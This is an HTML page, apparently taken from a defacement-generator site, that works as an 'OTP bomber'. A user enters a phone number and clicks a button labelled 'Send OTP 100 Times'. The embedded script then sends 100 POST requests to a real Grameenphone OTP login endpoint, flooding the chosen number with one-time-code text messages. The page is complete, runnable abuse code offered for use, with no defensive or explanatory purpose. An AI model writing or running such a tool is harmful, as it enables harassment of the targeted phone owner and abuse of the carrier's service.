<!--
--  Downloaded from : https://haxor.my.id/save/hshsvs.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Send OTP Request</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background: linear-gradient(to right, #ff7e5f, #feb47b); /* Beautiful gradient background */
            overflow: hidden;
        }
        .container {
            background: rgba(255, 255, 255, 0.9); /* Slightly transparent white background */
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 400px;
            text-align: center;
        }
        h1 {
            margin-bottom: 20px;
            font-size: 24px;
            color: #333;
        }
        label {
            display: block;
            margin-bottom: 10px;
            font-size: 18px;
            color: #555;
        }
        input {
            width: calc(100% - 20px);
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ccc;
            border-radius: 4px;
            margin-bottom: 20px;
        }
        button {
            background-color: #ff7e5f; /* Button color */
            color: white;
            border: none;
            padding: 10px 20px;
            font-size: 16px;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #feb47b; /* Button hover color */
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Send OTP Request</h1>
        <label for="phoneNumber">Phone Number:</label>
        <input type="text" id="phoneNumber" placeholder="Enter phone number">
        <button id="sendOtp">Send OTP 100 Times</button>
    </div>

    <audio id="backgroundMusic" autoplay loop>
        <source src="path/to/your/music-file.mp3" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>

    <script>
        document.getElementById('sendOtp').addEventListener('click', function() {
            const msisdn = document.getElementById('phoneNumber').value;
            const url = 'https://weblogin.grameenphone.com/backend/api/v1/otp';
            const requestOptions = {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify({ msisdn: msisdn })
            };

            // Function to send a single request
            function sendRequest() {
                return fetch(url, requestOptions)
                    .then(response => response.json())
                    .then(data => {
                        console.log('Success:', data);
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                    });
            }

            // Validate phone number
            if (msisdn) {
                // Send 100 requests
                for (let i = 0; i < 100; i++) {
                    sendRequest();
                }
            } else {
                alert('Please enter a phone number.');
            }
        });
    </script>
</body>
</html>
